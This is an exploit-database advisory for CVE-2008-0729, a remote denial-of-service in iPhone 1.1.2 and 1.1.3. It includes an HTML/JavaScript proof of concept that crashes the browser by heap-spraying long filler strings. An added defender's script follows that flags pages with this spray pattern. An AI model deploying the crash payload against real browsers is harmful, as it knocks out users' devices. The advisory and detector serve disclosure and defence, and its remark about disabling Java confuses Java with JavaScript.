Apple iPhone 1.1.3 remote DoS exploit

Published: 2008.02.12
Credit: Joshua Morin
Risk: Medium
CWE: CWE-399
CVE: CVE-2008-0729
Local: No
Remote: Yes

CVSS Base Score: 7.1/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

Vendor: Apple

Version affected: 1.1.2 and 1.1.3

Overview: The Apple iPhone remote DoS for 1.1.2 was discovered by c0ntex, but it actually works on 1.1.3 as well. After further research it also appears that this was a known issue with Firefox version 1.5.04 that affected it cross-platform.

It is called the Mozilla Firefox JavaScript navigator Object Vulnerability. I recommend you disable Java until Apple releases a fix or patch.

___________________________________

Proof of Concept (PoC):

<html><body><script>
function Demo() {
    var shellcode;
    var addr;
    var fill;
    alert('attempting a crash!');
    shellcode = unescape('%u0c0c');
    fill = unescape('%ucccc');
    addr = 0x02020202;
    var b = fill;
    while (b.length <= 0x40000) b+=b;
    var c = new Array();
    for (var i =0; i<36; i++) {
        c[i] =
            b.substring(0, 0x100000 - shellcode.length) + shellcode +
            b.substring(0, 0x100000 - shellcode.length) + shellcode +
            b.substring(0, 0x100000 - shellcode.length) + shellcode +
            b.substring(0, 0x100000 - shellcode.length) + shellcode;
    }
}
</script>
<input type='button' onClick='Demo()' value='Go!'>
</body></html>

_________________________________________

Discovered by Joshua Morin
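
A defender's triage check for pages shaped like the PoC above, as an added example that is not part of the original advisory: it flags script blocks that combine the PoC's traits (unescape of %u literals, a self-doubling string, slices sized with large hex constants, an array filled in a loop). The indicator names, the threshold of 3 and both sample pages are constructed for illustration.

```javascript
// Added example: static triage heuristic, not a vendor signature.
// Indicator names and the default threshold are assumptions.
const INDICATORS = [
  // unescape() fed only %uXXXX literals: raw 16-bit fill words
  { name: 'unicode-unescape', re: /unescape\s*\(\s*['"](?:%u[0-9a-fA-F]{4})+['"]\s*\)/ },
  // a string appended to itself under a loop header (b += b): exponential growth
  { name: 'self-doubling', re: /\b(?:while|for)\b[^{;]*\)\s*\{?\s*([A-Za-z_$][\w$]*)\s*\+=\s*\1\b/ },
  // substring()/substr() whose length is a hex constant of five or more digits
  { name: 'large-hex-slice', re: /\.substr(?:ing)?\s*\(\s*\d+\s*,\s*0x[0-9a-fA-F]{5,}/ },
  // an array element assigned first thing in a counted loop (copies kept alive)
  { name: 'array-fill-loop', re: /for\s*\([^)]*\)\s*\{\s*[A-Za-z_$][\w$]*\s*\[\s*[A-Za-z_$][\w$]*\s*\]\s*=/ },
];

// Concatenate the bodies of all inline <script> elements in the page.
function extractScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out.join('\n');
}

// One trait alone is common in benign code; the combination is what gets flagged.
function triage(html, threshold = 3) {
  const js = extractScripts(html);
  const hits = INDICATORS.filter(i => i.re.test(js)).map(i => i.name);
  return { hits, suspicious: hits.length >= threshold };
}

// Constructed sample with the same shape as the PoC on this page.
const SPRAY_LIKE = `<html><body><script>
var fill = unescape('%ucccc');
var b = fill;
while (b.length <= 0x40000) b+=b;
var c = new Array();
for (var i =0; i<36; i++) {
  c[i] = b.substring(0, 0x100000 - 1) + fill;
}
</script></body></html>`;

// Constructed benign sample: shares two traits, stays below the threshold.
const BENIGN = `<html><body><script>
var name = unescape('%u00e9');
var rows = [];
for (var i = 0; i < 10; i++) { rows[i] = name.substring(0, 3); }
</script></body></html>`;

console.log(triage(SPRAY_LIKE), triage(BENIGN));
```

The check only sees inline, unobfuscated script text, so treat a hit as a reason to inspect the page, not as a verdict.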

Copyright 2014, cxsecurity.com